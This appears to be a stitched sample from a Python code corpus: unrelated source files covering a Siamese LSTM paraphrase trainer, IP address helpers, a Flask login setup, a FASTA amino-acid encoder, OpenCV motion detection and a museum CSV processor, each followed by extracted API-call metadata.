other=other,
value=value
)
errors = self.validator.validate(input_values, rules)
errs = errors.get("credit_card_number")
self.assertEqual(errs[0], expected)
| [
"spotlight.errors.IN_ERROR.format",
"spotlight.errors.MIN_STRING_ERROR.format"
] | [((2608, 2658), 'spotlight.errors.MIN_STRING_ERROR.format', 'err.MIN_STRING_ERROR.format', ([], {'field': '"""custom"""', 'min': '(5)'}), "(field='custom', min=5)\n", (2635, 2658), True, 'from spotlight import errors as err\n'), ((4689, 4740), 'spotlight.errors.IN_ERROR.format', 'err.IN_ERROR.format', ([], {'field': 'field', 'values': 'new_values'}), '(field=field, values=new_values)\n', (4708, 4740), True, 'from spotlight import errors as err\n')] |
import socket, struct, six
def in_net(ipint, net):
#ipaddr = socket.inet_aton(ip)
netaddr, netmask = net.split('/')
netaddr = socket.inet_aton(netaddr)
#ipint = struct.unpack("!I", ipaddr)[0]
netint = struct.unpack("!I", netaddr)[0]
maskint = (0xFFFFFFFF << (32 - int(netmask))) & 0xFFFFFFFF
return ipint & maskint == netint
# http://stackoverflow.com/a/9591005
def ip2int(ip):
"""Convert an IP in dot-decimal notation to int.
:param ip: string.
"""
if not isinstance(ip, six.string_types):
raise ValueError("ip must be str and is {0} instead".format(type(ip)))
ip = str(ip)
packedIP = socket.inet_aton(ip)
return struct.unpack("!I", packedIP)[0]
def int2ip(ip):
"""Convert an IP in an 32bit int to a string in dot-decimal notation.
:param ip: int
"""
if not isinstance(ip, int):
raise ValueError("ip must be int and is {0} instead".format(type(ip)))
return socket.inet_ntoa(struct.pack('!I', ip))
| [
"struct.unpack",
"socket.inet_aton",
"struct.pack"
] | [((130, 155), 'socket.inet_aton', 'socket.inet_aton', (['netaddr'], {}), '(netaddr)\n', (146, 155), False, 'import socket, struct, six\n'), ((606, 626), 'socket.inet_aton', 'socket.inet_aton', (['ip'], {}), '(ip)\n', (622, 626), False, 'import socket, struct, six\n'), ((208, 236), 'struct.unpack', 'struct.unpack', (['"""!I"""', 'netaddr'], {}), "('!I', netaddr)\n", (221, 236), False, 'import socket, struct, six\n'), ((635, 664), 'struct.unpack', 'struct.unpack', (['"""!I"""', 'packedIP'], {}), "('!I', packedIP)\n", (648, 664), False, 'import socket, struct, six\n'), ((905, 926), 'struct.pack', 'struct.pack', (['"""!I"""', 'ip'], {}), "('!I', ip)\n", (916, 926), False, 'import socket, struct, six\n')] |
from time import time
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import numpy as np
import tensorflow as tf
import argparse
from tensorflow.python.keras.models import Model, Sequential
from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout
from sklearn.metrics import f1_score, roc_auc_score, accuracy_score
from util import make_w2v_embeddings
from util import split_and_zero_padding
from util import ManDist, generate_confidence_intervals
import os
from keras.backend.tensorflow_backend import set_session
np.random.seed(42)
parser = argparse.ArgumentParser(description='Paraphraser')
parser.add_argument('--gpu', type=int, default=3, metavar='NI', help='gpu id')
parser.add_argument('--filename', type=str, default='train_df.csv' , help='Train File')
args = parser.parse_args()
filename = args.filename
gpuid = args.gpu
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpuid)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
BUILD_EMBED =True
# Make word2vec embeddings
embedding_dim = 300
max_seq_length = 20
def int_pred(preds, thres):
predsx = preds.copy()
predsx[predsx>thres] = 1
predsx[predsx<=thres] = 0
return predsx
# File paths
TRAIN_CSV = str(filename)
train_file= TRAIN_CSV.split('/')[-1]
print(train_file)
TEST_CSV= './data/quora/test_df.csv'
# Load training set
train_df = pd.read_csv(TRAIN_CSV)
train_size = train_df.shape[0]
# train_df = train_df.iloc[:int(train_size/5.0)]
print(train_df.shape)
test_df = pd.read_csv(TEST_CSV)
print(test_df.shape)
for q in ['question1', 'question2']:
train_df[q + '_n'] = train_df[q]
test_df[q + '_n'] = test_df[q]
test_df = test_df[train_df.columns]
use_w2v = True
print('-------------')
# print(train_df.head())
# print(test_df.head())
train_size= train_df.shape[0]
print('train size: {}'.format(train_size))
print('-------------')
if BUILD_EMBED == True:
full_df = train_df.append(test_df, ignore_index=True)
full_df, embeddings = make_w2v_embeddings(full_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v)
print("sentences embedded")
else:
# full_df= pd.read_csv('./data/full_embeddings_A1.csv')
# embeddings = np.load('./data/embeddings/embedding_matrix_A1.npy')
print('embeddings loaded')
train_df = full_df.iloc[:train_size].copy()
test_df = full_df.iloc[train_size:].copy()
print('--------------------------')
# print(train_df.head())
# print(test_df.head())
print('--------------------------')
# test_df, embeddingsx = make_w2v_embeddings(test_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v)
# print("sentences embedded")
# test_df.to_csv('./data/test_embeddings.csv', index= False)
# Split to train validation
validation_size = 0.2
# training_size = len(train_df) - validation_size
X = train_df[['question1_n', 'question2_n']]
Y = train_df['is_duplicate']
X_train, X_validation, Y_train, Y_validation = train_test_split(X, Y, test_size=validation_size, random_state= 42)
X_test = test_df[['question1_n', 'question2_n']]
Y_test = test_df['is_duplicate']
X_train = split_and_zero_padding(X_train, max_seq_length)
X_validation = split_and_zero_padding(X_validation, max_seq_length)
X_test= split_and_zero_padding(X_test, max_seq_length)
# Convert labels to their numpy representations
Y_train = Y_train.values
Y_validation = Y_validation.values
Y_test = Y_test.values
# Make sure everything is ok
assert X_train['left'].shape == X_train['right'].shape
assert len(X_train['left']) == len(Y_train)
# --
# Model variables
gpus = 1
batch_size = 1024 * gpus
n_epoch = 40
n_hidden = 50
# Define the shared model
with tf.device('/gpu:0'):
set_session(tf.Session(config=config))
x = Sequential()
x.add(Embedding(len(embeddings), embedding_dim,
weights=[embeddings], input_shape=(max_seq_length,), trainable=False))
# CNN
# x.add(Conv1D(250, kernel_size=5, activation='relu'))
# x.add(GlobalMaxPool1D())
# x.add(Dense(250, activation='relu'))
# x.add(Dropout(0.3))
# x.add(Dense(50, activation='sigmoid'))
# LSTM
x.add(LSTM(n_hidden))
shared_model = x
# The visible layer
left_input = Input(shape=(max_seq_length,), dtype='int32')
right_input = Input(shape=(max_seq_length,), dtype='int32')
# Pack it all up into a Manhattan Distance model
malstm_distance = ManDist()([shared_model(left_input), shared_model(right_input)])
model = Model(inputs=[left_input, right_input], outputs=[malstm_distance])
model.compile(loss='mean_squared_error', optimizer=tf.keras.optimizers.Adam(), metrics=['accuracy'])
model.summary()
shared_model.summary()
############################
# Start training
training_start_time = time()
malstm_trained = model.fit([X_train['left'], X_train['right']], Y_train,
batch_size=batch_size, epochs=3,
validation_data=([X_validation['left'], X_validation['right']], Y_validation))
training_end_time = time()
print('INITIAL SCORES')
print('--------------------------')
preds = model.predict([X_validation['left'], X_validation['right']], batch_size=batch_size )
predsx = preds.copy()
predsx[predsx>0.4] = 1
predsx[predsx<=0.4] = 0
print("DEV F1 Score: {},\t DEV AUC ROC : {},\t DEV ACC: {}".format(f1_score(Y_validation, predsx), roc_auc_score(Y_validation, preds), accuracy_score(Y_validation, predsx) ))
preds = model.predict([X_test['left'], X_test['right']], batch_size=batch_size )
predsx = preds.copy()
predsx[predsx>0.4] = 1
predsx[predsx<=0.4] = 0
print("TEST F1 Score: {},\t TEST AUC ROC : {},\t TEST ACC: {}".format(f1_score(Y_test, predsx), roc_auc_score(Y_test, preds), accuracy_score(Y_test, predsx) ))
######################################
training_start_time = time()
malstm_trained = model.fit([X_train['left'], X_train['right']], Y_train,
batch_size=batch_size, epochs=n_epoch,
validation_data=([X_validation['left'], X_validation['right']], Y_validation))
training_end_time = time()
model.save('./data/SiameseLSTM_epoch25.h5')
print('FINAL SCORES')
print('--------------------------')
preds = model.predict([X_validation['left'], X_validation['right']], batch_size=batch_size )
thres = 0.4
predsx = preds.copy()
predsx[predsx>thres] = 1
predsx[predsx<=thres] = 0
dev_score= "DEV F1 Score: {},\t DEV AUC ROC : {},\t DEV ACC: {}".format(f1_score(Y_validation, predsx), roc_auc_score(Y_validation, preds), accuracy_score(Y_validation, predsx) )
print(dev_score)
preds = model.predict([X_test['left'], X_test['right']], batch_size=batch_size )
predsx = preds.copy()
predsx[predsx>thres] = 1
predsx[predsx<=thres] = 0
test_score= "TEST F1 Score: {},\t TEST AUC ROC : {},\t TEST ACC: {}".format(f1_score(Y_test, predsx), roc_auc_score(Y_test, preds), accuracy_score(Y_test, predsx) )
print(test_score)
acc_scores =[]
thr = 0.4
acc_scores.append(accuracy_score(Y_test, int_pred(preds, thr)))
sv_scores = "ACC SCORES : {}".format(str(acc_scores))
print(sv_scores)
final_preds = np.array(list(zip(Y_test, preds, predsx)))
np.save('./data/preds/predsLSTM_'+str(train_file)+ '.npy', final_preds)
print('--------------------------')
print("Training time finished.\n%d epochs in %12.2f" % (n_epoch, training_end_time - training_start_time))
fo = open('./data/scores_lstm/scoresLSTM_'+str(train_file)+ '.txt', 'w')
fo.write(train_file+'\n')
fo.write('-----------\n')
fo.write(sv_scores+'\n')
fo.write('-----------\n')
fo.write(test_score+'\n')
fo.close()
print(str(malstm_trained.history['val_acc'][-1])[:6] + "(max: " + str(max(malstm_trained.history['val_acc']))[:6] + ")")
print("Done.")
print(train_df.shape)
print(train_file)
| [
"util.ManDist",
"pandas.read_csv",
"sklearn.metrics.roc_auc_score",
"tensorflow.python.keras.layers.Input",
"argparse.ArgumentParser",
"tensorflow.python.keras.models.Model",
"tensorflow.Session",
"util.split_and_zero_padding",
"numpy.random.seed",
"tensorflow.ConfigProto",
"tensorflow.python.keras.models.Sequential",
"tensorflow.python.keras.layers.LSTM",
"tensorflow.device",
"matplotlib.use",
"sklearn.model_selection.train_test_split",
"time.time",
"sklearn.metrics.accuracy_score",
"sklearn.metrics.f1_score",
"tensorflow.keras.optimizers.Adam",
"util.make_w2v_embeddings"
] | [((60, 81), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (74, 81), False, 'import matplotlib\n'), ((676, 694), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (690, 694), True, 'import numpy as np\n'), ((705, 755), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Paraphraser"""'}), "(description='Paraphraser')\n", (728, 755), False, 'import argparse\n'), ((1051, 1067), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (1065, 1067), True, 'import tensorflow as tf\n'), ((1476, 1498), 'pandas.read_csv', 'pd.read_csv', (['TRAIN_CSV'], {}), '(TRAIN_CSV)\n', (1487, 1498), True, 'import pandas as pd\n'), ((1611, 1632), 'pandas.read_csv', 'pd.read_csv', (['TEST_CSV'], {}), '(TEST_CSV)\n', (1622, 1632), True, 'import pandas as pd\n'), ((2980, 3046), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'Y'], {'test_size': 'validation_size', 'random_state': '(42)'}), '(X, Y, test_size=validation_size, random_state=42)\n', (2996, 3046), False, 'from sklearn.model_selection import train_test_split\n'), ((3142, 3189), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_train', 'max_seq_length'], {}), '(X_train, max_seq_length)\n', (3164, 3189), False, 'from util import split_and_zero_padding\n'), ((3205, 3257), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_validation', 'max_seq_length'], {}), '(X_validation, max_seq_length)\n', (3227, 3257), False, 'from util import split_and_zero_padding\n'), ((3266, 3312), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_test', 'max_seq_length'], {}), '(X_test, max_seq_length)\n', (3288, 3312), False, 'from util import split_and_zero_padding\n'), ((2080, 2165), 'util.make_w2v_embeddings', 'make_w2v_embeddings', (['full_df'], {'embedding_dim': 'embedding_dim', 'empty_w2v': '(not use_w2v)'}), '(full_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v\n )\n', (2099, 2165), False, 'from util import make_w2v_embeddings\n'), ((3692, 3711), 'tensorflow.device', 'tf.device', (['"""/gpu:0"""'], {}), "('/gpu:0')\n", (3701, 3711), True, 'import tensorflow as tf\n'), ((3758, 3770), 'tensorflow.python.keras.models.Sequential', 'Sequential', ([], {}), '()\n', (3768, 3770), False, 'from tensorflow.python.keras.models import Model, Sequential\n'), ((4178, 4223), 'tensorflow.python.keras.layers.Input', 'Input', ([], {'shape': '(max_seq_length,)', 'dtype': '"""int32"""'}), "(shape=(max_seq_length,), dtype='int32')\n", (4183, 4223), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4239, 4284), 'tensorflow.python.keras.layers.Input', 'Input', ([], {'shape': '(max_seq_length,)', 'dtype': '"""int32"""'}), "(shape=(max_seq_length,), dtype='int32')\n", (4244, 4284), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4429, 4495), 'tensorflow.python.keras.models.Model', 'Model', ([], {'inputs': '[left_input, right_input]', 'outputs': '[malstm_distance]'}), '(inputs=[left_input, right_input], outputs=[malstm_distance])\n', (4434, 4495), False, 'from tensorflow.python.keras.models import Model, Sequential\n'), ((4712, 4718), 'time.time', 'time', ([], {}), '()\n', (4716, 4718), False, 'from time import time\n'), ((4946, 4952), 'time.time', 'time', ([], {}), '()\n', (4950, 4952), False, 'from time import time\n'), ((5741, 5747), 'time.time', 'time', ([], {}), '()\n', (5745, 5747), False, 'from time import time\n'), ((5981, 5987), 'time.time', 'time', ([], {}), '()\n', (5985, 5987), False, 'from time import time\n'), ((3726, 3751), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (3736, 3751), True, 'import tensorflow as tf\n'), ((4107, 4121), 'tensorflow.python.keras.layers.LSTM', 'LSTM', (['n_hidden'], {}), '(n_hidden)\n', (4111, 4121), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4355, 4364), 'util.ManDist', 'ManDist', ([], {}), '()\n', (4362, 4364), False, 'from util import ManDist, generate_confidence_intervals\n'), ((6351, 6381), 'sklearn.metrics.f1_score', 'f1_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (6359, 6381), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6383, 6417), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_validation', 'preds'], {}), '(Y_validation, preds)\n', (6396, 6417), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6419, 6455), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (6433, 6455), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6713, 6737), 'sklearn.metrics.f1_score', 'f1_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (6721, 6737), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6739, 6767), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_test', 'preds'], {}), '(Y_test, preds)\n', (6752, 6767), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6769, 6799), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (6783, 6799), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((4549, 4575), 'tensorflow.keras.optimizers.Adam', 'tf.keras.optimizers.Adam', ([], {}), '()\n', (4573, 4575), True, 'import tensorflow as tf\n'), ((5251, 5281), 'sklearn.metrics.f1_score', 'f1_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (5259, 5281), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5283, 5317), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_validation', 'preds'], {}), '(Y_validation, preds)\n', (5296, 5317), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5319, 5355), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (5333, 5355), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5587, 5611), 'sklearn.metrics.f1_score', 'f1_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (5595, 5611), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5613, 5641), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_test', 'preds'], {}), '(Y_test, preds)\n', (5626, 5641), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5643, 5673), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (5657, 5673), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n')] |
from __future__ import absolute_import
from django.conf import settings
import jinja2
from ..contextutil import context_to_dict
class Jinja2Template(object):
def __init__(self, template_obj):
self.template_obj=template_obj
def render(self, context):
return self.template_obj.render(context_to_dict(context))
def get_template_from_string(source, origin=None, name=None):
opts=getattr(settings, 'JINJA2_TEMPLATE_OPTS', {})
if opts:
opts=opts.copy()
if not 'loader' in opts:
opts['loader']=jinja2.FileSystemLoader(settings.JINJA2_TEMPLATE_DIRS)
environment=jinja2.Environment(**opts)
template=environment.from_string(source)
template.name=name
return Jinja2Template(template)
| [
"jinja2.FileSystemLoader",
"jinja2.Environment"
] | [((627, 653), 'jinja2.Environment', 'jinja2.Environment', ([], {}), '(**opts)\n', (645, 653), False, 'import jinja2\n'), ((555, 609), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['settings.JINJA2_TEMPLATE_DIRS'], {}), '(settings.JINJA2_TEMPLATE_DIRS)\n', (578, 609), False, 'import jinja2\n')] |
#importing csv & json module
import csv
import json
# csv file name
inp_filename = "MetObjects.csv"
out_filename1 = "Uniqueyearnode.csv"
out_filename2 = "Uniqueyearedge.csv"
out_filename3 = "uniqueyear-met.csv"
#initializing the titles and rows list
Artist_Nationality = "American"
Unique_year = []
#----------------------- v lookup and create unique id
year_id_lookup = {}
unique_year_id_number = 2013
#----------------------- output list
museumname1 = "MET"
museumid = "1"
typemet = "Directed"
Weightmet = "1"
#readdata from csv
with open(inp_filename, 'r') as in_Met:
reader = csv.DictReader(in_Met)
## CSV is open and reading ready
for row in reader:
artistcol = row['Artist Display Name']
year = row['Object Begin Date']
Object = row['Title']
if 'Modern and Contemporary Art' in row ['Department'] and Artist_Nationality in row['Artist Nationality']:
if row['Object Begin Date'] not in Unique_year:
Unique_year.append(row['Object Begin Date'])
year_id_lookup[row['Object Begin Date']] = unique_year_id_number
unique_year_id_number = unique_year_id_number + 1
# output yearnode
with open(out_filename1,'w') as out_MET1:
writer= csv.writer(out_MET1)
writer.writerow(['Label2', 'id', 'node'])
for uniyear in Unique_year:
writer.writerow([uniyear,year_id_lookup[uniyear],year_id_lookup[uniyear]])
# output year and met edge
with open(out_filename2,'w') as out_MET2:
writer= csv.writer(out_MET2)
writer.writerow(['Label','Museum','source','target','Type','Weight'])
for uniyear in Unique_year:
writer.writerow([uniyear,museumname1,museumid,year_id_lookup[uniyear],typemet,Weightmet])
# output yearnode
with open(out_filename3,'w') as out_MET3:
writer= csv.writer(out_MET3)
writer.writerow(['Label2'])
for uniyear in Unique_year:
writer.writerow([uniyear,museumname1])
#row['Department'], row['Title'],row['Artist Display Name'], row['Object Begin Date'],row['Medium'], row['Dimensions']
# if row['Artist Display Name'] not in Artsit:
# Artsit.append(row['Artist Display Name']) | [
"csv.writer",
"csv.DictReader"
] | [((591, 613), 'csv.DictReader', 'csv.DictReader', (['in_Met'], {}), '(in_Met)\n', (605, 613), False, 'import csv\n'), ((1259, 1279), 'csv.writer', 'csv.writer', (['out_MET1'], {}), '(out_MET1)\n', (1269, 1279), False, 'import csv\n'), ((1548, 1568), 'csv.writer', 'csv.writer', (['out_MET2'], {}), '(out_MET2)\n', (1558, 1568), False, 'import csv\n'), ((1848, 1868), 'csv.writer', 'csv.writer', (['out_MET3'], {}), '(out_MET3)\n', (1858, 1868), False, 'import csv\n')] |
import cv2
import time
import argparse
#importing the neccessery libraries
cv2.ocl.setUseOpenCL(False)
#disenabling opencl because it causes an error to do with teh background subtraction
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--min-area", type=int, default=200, help="minimum area")
args = vars(ap.parse_args())
#arguement parser with minimum area for it to pick up as motion
cap = cv2.VideoCapture(0)
#getting the video out from the webcam
fgbg = cv2.createBackgroundSubtractorMOG2()
#getting the background subtractor ready for use
while (1):
ret, frame = cap.read()
#starting the loop while reading from the video capture
fgmask = fgbg.apply(frame)
#applying the bakground subtractor
thresh = fgmask
thresh = cv2.GaussianBlur(thresh, (21, 21), 0)
thresh = cv2.threshold(thresh, 127, 255, cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh, None, iterations=1)
#making the image binary and adjusting it for the contouring
_, cnts, _= cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#find the contours aroung the edges of the motion
for c in cnts:
if cv2.contourArea(c) < args["min_area"]:
continue
#putting the contour area through the arguement parser for minimum area
c = max(cnts, key=cv2.contourArea)
(x, y, w, h) = cv2.boundingRect(c)
cv2.rectangle(frame, (x, y), (x+ w, y + h), (0, 0, 255), 2)
#draw the rectangle around the object
cv2.imshow("Feed", frame)
#show the image in a new window
key = cv2.waitKey(1) & 0xFF
if key == ord("s"):
break
#break the loop
cap.release()
cv2.destroyAllWindows()
#stop the windows
| [
"cv2.ocl.setUseOpenCL",
"cv2.createBackgroundSubtractorMOG2",
"cv2.rectangle",
"argparse.ArgumentParser",
"cv2.threshold",
"cv2.imshow",
"cv2.contourArea",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"cv2.dilate",
"cv2.GaussianBlur",
"cv2.waitKey",
"cv2.boundingRect"
] | [((77, 104), 'cv2.ocl.setUseOpenCL', 'cv2.ocl.setUseOpenCL', (['(False)'], {}), '(False)\n', (97, 104), False, 'import cv2\n'), ((196, 221), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (219, 221), False, 'import argparse\n'), ((402, 421), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (418, 421), False, 'import cv2\n'), ((469, 505), 'cv2.createBackgroundSubtractorMOG2', 'cv2.createBackgroundSubtractorMOG2', ([], {}), '()\n', (503, 505), False, 'import cv2\n'), ((1680, 1703), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1701, 1703), False, 'import cv2\n'), ((769, 806), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['thresh', '(21, 21)', '(0)'], {}), '(thresh, (21, 21), 0)\n', (785, 806), False, 'import cv2\n'), ((887, 925), 'cv2.dilate', 'cv2.dilate', (['thresh', 'None'], {'iterations': '(1)'}), '(thresh, None, iterations=1)\n', (897, 925), False, 'import cv2\n'), ((1513, 1538), 'cv2.imshow', 'cv2.imshow', (['"""Feed"""', 'frame'], {}), "('Feed', frame)\n", (1523, 1538), False, 'import cv2\n'), ((820, 870), 'cv2.threshold', 'cv2.threshold', (['thresh', '(127)', '(255)', 'cv2.THRESH_BINARY'], {}), '(thresh, 127, 255, cv2.THRESH_BINARY)\n', (833, 870), False, 'import cv2\n'), ((1374, 1393), 'cv2.boundingRect', 'cv2.boundingRect', (['c'], {}), '(c)\n', (1390, 1393), False, 'import cv2\n'), ((1402, 1462), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 0, 255)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n', (1415, 1462), False, 'import cv2\n'), ((1585, 1599), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (1596, 1599), False, 'import cv2\n'), ((1167, 1185), 'cv2.contourArea', 'cv2.contourArea', (['c'], {}), '(c)\n', (1182, 1185), False, 'import cv2\n')] |
from webtest import TestApp
# from boddle import boddle
import kafka_selfservice
# def test_webapp_index():
# with boddle(params={'name': 'Derek'}):
# assert kafka_selfservice.index() == 'Hi Derek!'
def test_webapp_ping():
app = TestApp(kafka_selfservice.app)
assert app.get('/v1/ping').status == '200 OK'
| [
"webtest.TestApp"
] | [((239, 269), 'webtest.TestApp', 'TestApp', (['kafka_selfservice.app'], {}), '(kafka_selfservice.app)\n', (246, 269), False, 'from webtest import TestApp\n')] |
#! /usr/bin/python3
import random
# fasta_chars = "ANDRCGQEHILKMFPSTYWV"
codec = {
"A": (0, 0, 0, 0, 0),
"N": (0, 0, 0, 0, 1),
"D": (0, 0, 0, 1, 0),
"R": (0, 0, 0, 1, 1),
"C": (0, 0, 1, 0, 0),
"G": (0, 0, 1, 0, 1),
"Q": (0, 0, 1, 1, 0),
"E": (0, 0, 1, 1, 1),
"H": (0, 1, 0, 0, 0),
"I": (0, 1, 0, 0, 1),
"L": (0, 1, 0, 1, 0),
"K": (0, 1, 0, 1, 1),
"M": (0, 1, 1, 0, 0),
"F": (0, 1, 1, 0, 1),
"P": (0, 1, 1, 1, 0),
"S": (0, 1, 1, 1, 1),
"T": (1, 0, 0, 0, 0),
"Y": (1, 0, 0, 1, 0),
"W": (1, 0, 0, 0, 1),
"V": (1, 0, 0, 1, 1)
}
def get_fchar_for_code(code):
for fc in codec:
if codec[fc] == code:
return fc
return None
def get_fstr_for_codes(codeseq):
if len(codeseq) % 5 != 0:
raise Exception("codeseq must be a multiple of code width (which is 5)")
res = list()
for i in range(len(codeseq) // 5):
cur_code = tuple( codeseq[i * 5 : (i+1) * 5] )
cur_fchar = get_fchar_for_code(cur_code)
if cur_fchar is not None:
res.append(cur_fchar)
else:
res.append("-")
return "".join(res)
#class _FastaCodeIterator:
# def __init__(self, fasta_string, window):
# if len(fasta_string) < window:
# raise Exception("fasta_string must be long enough to form at least 1 window")
#
# self.fasta_string = fasta_string
# self.window = window
#
# self.i = 0
#
# def __next__(self):
# if self.i > len(self.fasta_string) - self.window:
# raise StopIteration
#
# code = list()
# for w in range(self.window):
# c = self.fasta_string[self.i + w]
# if c not in codec:
# raise Exception("fasta string contained character not in codec")
#
# for num in codec[c]:
# code.append(num)
#
# self.i += 1
#
# return code
def get_code_iterator(fasta_string, window):
for i in range( (len(fasta_string) - window) + 1):
res = list()
for w in range(window):
c = fasta_string[i + w]
if c not in codec:
raise Exception("non-FASTA character in fasta string")
for e in codec[c]:
res.append(e)
yield res
class FastaParser:
def __init__(self):
self.records = []
def add_from_stream(self, fstream):
last_record = ""
for line in fstream:
line.strip()
if len(line) < 1:
continue
if line[0] == '>' or line[0] == ';':
# store record if there is one
if len(last_record) > 0:
self.records.append( last_record )
last_record = ""
continue
for char in line:
if char in codec:
last_record += char
if len(last_record) > 0:
self.records.append( last_record )
def add_from_file(self, filename):
with open(filename, "r") as ifile:
self.add_from_stream(ifile)
def clear(self):
self.records.clear()
# def get_fasta_iterator(self, window):
# fstring = random.choice(self.records)
#
# return _FastaCodeIterator(fstring, window)
def get_random_record(self):
return random.choice(self.records)
def get_iter_for_random_record(self, window):
return get_code_iterator(random.choice(self.records), window)
| [
"random.choice"
] | [((3361, 3388), 'random.choice', 'random.choice', (['self.records'], {}), '(self.records)\n', (3374, 3388), False, 'import random\n'), ((3473, 3500), 'random.choice', 'random.choice', (['self.records'], {}), '(self.records)\n', (3486, 3500), False, 'import random\n')] |
import unittest
from uuid import (
uuid4,
)
from tests.utils import (
Product,
)
class TestExternalEntity(unittest.TestCase):
def test_values(self):
uuid = uuid4()
product = Product(uuid, 3, "apple", 3028)
self.assertEqual(uuid, product.uuid)
self.assertEqual(3, product.version)
self.assertEqual("apple", product.title)
self.assertEqual(3028, product.quantity)
if __name__ == "__main__":
unittest.main()
| [
"unittest.main",
"tests.utils.Product",
"uuid.uuid4"
] | [((459, 474), 'unittest.main', 'unittest.main', ([], {}), '()\n', (472, 474), False, 'import unittest\n'), ((179, 186), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (184, 186), False, 'from uuid import uuid4\n'), ((205, 236), 'tests.utils.Product', 'Product', (['uuid', '(3)', '"""apple"""', '(3028)'], {}), "(uuid, 3, 'apple', 3028)\n", (212, 236), False, 'from tests.utils import Product\n')] |
from flask import current_app, Blueprint
from flask_login import LoginManager
from ooer.models.user import User
login_manager = LoginManager()
login_manager.login_view = 'auth.login'
login_manager.login_message = u'Please log in to access this page.'
login_manager.login_message_category = 'info'
login_manager.refresh_view = 'auth.reauth'
login_manager.needs_refresh_message = u'To protect your account, please reauthenticate to access this page.'
login_manager.needs_refresh_message_category = 'info'
@login_manager.user_loader
def user_loader(id):
return User.objects(id=id).first()
login_manager.init_app(current_app, add_context_processor=True)
blueprint = Blueprint('auth', __name__)
from views import login, logout, forums
| [
"flask_login.LoginManager",
"ooer.models.user.User.objects",
"flask.Blueprint"
] | [((130, 144), 'flask_login.LoginManager', 'LoginManager', ([], {}), '()\n', (142, 144), False, 'from flask_login import LoginManager\n'), ((675, 702), 'flask.Blueprint', 'Blueprint', (['"""auth"""', '__name__'], {}), "('auth', __name__)\n", (684, 702), False, 'from flask import current_app, Blueprint\n'), ((568, 587), 'ooer.models.user.User.objects', 'User.objects', ([], {'id': 'id'}), '(id=id)\n', (580, 587), False, 'from ooer.models.user import User\n')] |
import os
import sys
from relogic.utils.file_utils import cached_path, RELOGIC_CACHE
PACKAGE_PATH = {
"Anserini": "https://git.uwaterloo.ca/p8shi/data-server/raw/master/anserini-0.6.0-SNAPSHOT-fatjar.jar"
}
